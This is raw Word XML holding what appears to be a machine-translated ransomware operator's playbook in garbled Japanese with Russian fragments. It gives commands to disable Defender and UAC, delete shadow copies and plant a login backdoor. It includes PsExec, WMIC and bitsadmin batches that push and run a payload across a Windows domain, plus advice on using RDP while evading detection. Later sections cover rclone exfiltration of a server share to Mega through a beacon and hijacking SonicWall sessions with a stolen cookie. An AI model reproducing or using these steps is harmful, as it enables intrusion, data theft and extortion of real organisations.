      </w:r>
    </w:p>
    <w:p w14:paraId="7272F29E" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>UAC - 管理者から実行の許可を要求するウィンドウのポップアップを削除します</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED28ED6" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>defoff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> - ディフェンダーを殺す(すべてで機能するわけではなく、後で</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>taskmgr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>で</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Mspeng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>プロセスの存在を確認してください)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBE6FE6" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>RDP - ポート 3389 を発生させる</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD7A152" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="1D54ADAB" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="54973BA8" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>del - シャドウコピーを削除(削除の許可を求め、-yを押す)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D88142" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>NS - 隠しシステムディスクのマウント(パス:98)!!AB解体後の使用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E3AA07" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="1CFE9B59" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t xml:space="preserve">NLA+BACK - NLA+パスワードレスログインバックドアを修正し、次のように機能します。 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9A5FC6" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t xml:space="preserve">      ログインウィンドウ(クレジットの入力を求められる場所)で-Win + Yを押すと、</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>ウィンドウがポップアップします</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335922D8" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t xml:space="preserve">      書く</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>taskmgr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>、ユーザーのタブを開き、任意のユーザーを右クリックします - 接続</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9A924E" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t xml:space="preserve">PSは - 10 \では動作しませんパスが必要です </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DEBB25F" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="4626C00D" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="57A28EE2" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ドメイン全体でファイルをコピーするためのバッチ</w:t>
      </w:r>
      <w:r>
        <w:t>の収集</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12505DFA" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t xml:space="preserve">start PsExec.exe /accepteula @C:\share$\comps1.txt -u DOMAIN\ADMINISTRATOR -p PASSWORD cmd /c COPY "\\PRIMARY ДОМЕН КОНТРОЛЛЕР\share$\fx166.exe" "C:\windows\temp\" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30320C8C" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> "コピー.BAT"</w:t>
      </w:r>
      <w:r>
        <w:t>として保存</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1830B4" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="3A1114B3" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t xml:space="preserve">  バッチシートを収集して、ドメイン全体でファイルを実行する</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C53F06B" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t xml:space="preserve">start PsExec.exe -d @C:\share$\comps1.txt -u DOMAIN\ADMINISTRATOR -p PASSWORD </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /c c:\windows\temp\fx166.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3B0718" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> "EXE.BAT"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> として保存</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228C15D6" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="732E7ECB" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ドメイン全体でファイルをコピーして実行するための WMI バッチ</w:t>
      </w:r>
      <w:r>
        <w:t>の収集</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C31998" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>wmic /node:@C:\share$\comps1.txt /user:"DOMAIN\Administrator" /password:"PASSWORD" プロセス呼び出しを開始します create "cmd.exe /c bitsadmin /transfer fx166 \\ДОМЕН КОНТРОЛЛЕР\share$\fx166.exe %APPDATA%\fx166.exe&amp;%APPDATA%\fx166.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB9D322" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="6FE57CF1" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="51F70F3A" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>--------------------------------------------------------RDP------------------------------------------------------------!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1010A5" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t xml:space="preserve"> ロケールで本当にRDPが必要な場合 :: 火傷を負わない方法 ::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195B44FD" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>1.サーバーOSを選択し、pingを実行して検索します。ディラのリストを作る</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D72567B" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>'ls \\REMOTE-HOSTNAME\C$\Users'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066C8BD9" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>変更済みで並べ替えます。 新鮮なタッチがある場合、次の状況が簡単に発生するため、これらの利点の下には絶対に行くことができません-あなたがボールを振ったり、何かをテストしたりしているときに、突然このユーザーがこのPCに来て、あなたの作業結果を見ます...検出。チス</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tka</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>。 ゲーム終了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3DAB2C" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>これを行うには、</w:t>
      </w:r>
      <w:r>
        <w:t>たとえば、昨年このサーバーにアクセスしたユーザーを選択します。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11DC7853" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>メカニズムは明確だと思いますか?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5200CA9D" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>2. DAでハングアップしているがほとんど使用されていないDAからの選択を使用する</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0369C74D" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="0C0F756C" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>シェルネットグループ「Domain Admins」/domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4818564C" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="68B385F0" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="4A262A58" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">これは </w:t>
      </w:r>
      <w:r>
        <w:t>私たちのYESのリストです</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353349DC" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>次に</w:t>
      </w:r>
      <w:r>
        <w:t>、ユーザーの利益のために、順番に情報を削除します</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA5593D" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>'shell net user Administrator /domain' (シェル ネット ユーザー 管理者 /ドメイン)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615D243E" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>[Last Logon] 文字列 (つまり、ネットワークに最後にログインした日時) を探します (グリッド内の任意の PC で)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D44495F" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 一昨日、半年、またはあなたのような日付があれば、それは素晴らしいことです。 それこそが、私たちが必要としているものです。 ほとんどの場合、これはサービスアカウントまたは管理者のいずれかであり、RDPであなたに干渉することはありません。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBF9C19" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="04D45C14" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">このような </w:t>
      </w:r>
      <w:r>
        <w:t>簡単なトリックは、RDPで愚かに燃え上がらないようにするのに役立ちます</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DD1B71" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="7A72B662" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>3.完了したら、RDPに座らないでください-ログオフ(必須)を実行します。単にRDPウィンドウを閉じることと混同しないでください。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCBC2DE" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="2CFF7C77" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="6056B573" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="797BDCE8" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="1FD6B236" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="0A7F73E6" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>---------------------------------------------補足資料-------------------------------------------------------!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568DED75" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="1DDB9678" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>---RCLONEマニュアル--!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2841D4" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>1. OFから</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rclone</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>をダウンロードし、</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rclone.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>ファイルを作成して、exeと同じフォルダに配置します</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F721962" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>2.次に、管理者からCMDを開き、構成ファイルを含むプログラムが配置されているフォルダーに移動して、コマンド</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rcloneconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>を実行します。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5744CDB8" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>3.次に、構成を作成するメニューがポップアップ表示され(大まかに言えば、Megaのログインとパスワードを入力)、信条が入力された後、プログラムはそれらを暗号化された形式で</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rclone.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>ファイルに書き込みます。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0594F546" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>4.受信した</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rclone.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>ファイルとプログラム自体を取り、情報を取得するホストに配置します。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E922159" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>5.設定とプログラムを配置したフォルダのCSビーコンに移動し、コマンドを実行します。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07161F8A" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="76C49A31" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>シェル rclone.exe コピー "\\trucamtldc01\E$\Data" リモート:データ -q --無視-既存 --自動確認 --マルチスレッドストリーム 12 --転送 12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5C3851" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="3FE978A2" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>remote:Data</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> - そのだけを変更します。 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC5A668" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>「リモート」はあなたのメガの名前です。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8DCF88" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>「NT」は、ダウンロードされるmeg内のディレクトリであり、そこにない場合は、それ自体を作成します。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5F4FAC" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="15806D54" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>さて</w:t>
      </w:r>
      <w:r>
        <w:t>、ここで明らかなのは、引用符で囲まれているのはポンピングするものであり、ディスク全体であっても、必要なものを何でも指定できるということです</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEEDBF2" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>remote - ステップ 3 の実行時に指定した設定の名前、data - 情報がアップロードされる MEG 内のフォルダー</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3878C81A" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="0CA16A96" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>---ソニックウォール---!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2782A781" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ブラウザセッションを介してSonicWallを操作する必要がある人</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">向け </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A60BD61" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t xml:space="preserve"> WEBブラウザを使用してアクセスする</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4E10F2" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="69ED0487" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>- スクリプト出力からセッションを取得します(例:「47ZjFKx24Nj2h0UtZKX2OYnZLgRg05aX2SuaotVzrQg=」)。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D3AF78" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>- シークレットモードでブラウザを開き、開発者コンソール(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>js</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-console)を開きます。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FF752D" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>- セッション ID を base64 でエンコードする</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3EE602" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t xml:space="preserve">  &gt;&gt; btoa ("47ZjFKx24Nj2h0UtZKX2OYnZLgRg05aX2SuaotVzrQg=") [ENTER]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0AD06F" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t xml:space="preserve">  "NDdaakZLeDI0TmoyaDBVdFpLWDJPWW5aTGdSZzA1YVgyU3Vhb3RWenJRZz0="</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FEB404F" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>- URLに https://target を入力します(https://target/cgi-bin/welcome にリダイレクトします)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0F1EFE" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>- コンソールのapplication/cookiesに移動し、Cookieを追加します</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0224DFB4" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t xml:space="preserve">  スワップ : NDdaakZLeDI0TmoyaDBVdFpLWDJPWW5aTGdSZzA1YVgyU3Vhb3RWenJRZz0=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA69F61" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>- ブラウザー (.../</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-bin/welcome) で URL を編集して https://target/cgi-bin/portal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223D45C7" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>- ユーザーのセッションでリソースにアクセスする</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AA9F3D" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="63ABA69F" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>---Citrixのインストールと構成---!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B241C32" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>----------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435A7C5C" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t xml:space="preserve">Windows 7 または Windows 10 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0161B93B" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>InternetExplorer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 11 または Google Chrome。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0BBDD0" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>braruzerna</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nastraivaem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Citrix Workspaceの設立後</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667DA2F0" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="7CE0B660" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>勝利7:https://www.citrix.com/en-gb/downloads/workspace-app/legacy-workspace-app-for-windows-ltsr/workspace-app-for-windows-1912-ltsr-cu2.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C179A9" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t xml:space="preserve">10勝: https://www.citrix.com/en-gb/downloads/workspace-app/windows/workspace-app-for-windows-latest.htmlhttps://www.citrix.com/en-gb/downloads/workspace-app/windows/workspace-app-for-windows-latest.htmla 勝10: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40651ABE" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>https://www.citrix.com/en-gb/downloads/workspace-app/windows/workspace-app-for-windows-latest.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BFB668" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="32C55CEB" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Ustanavlivaem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>citrix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
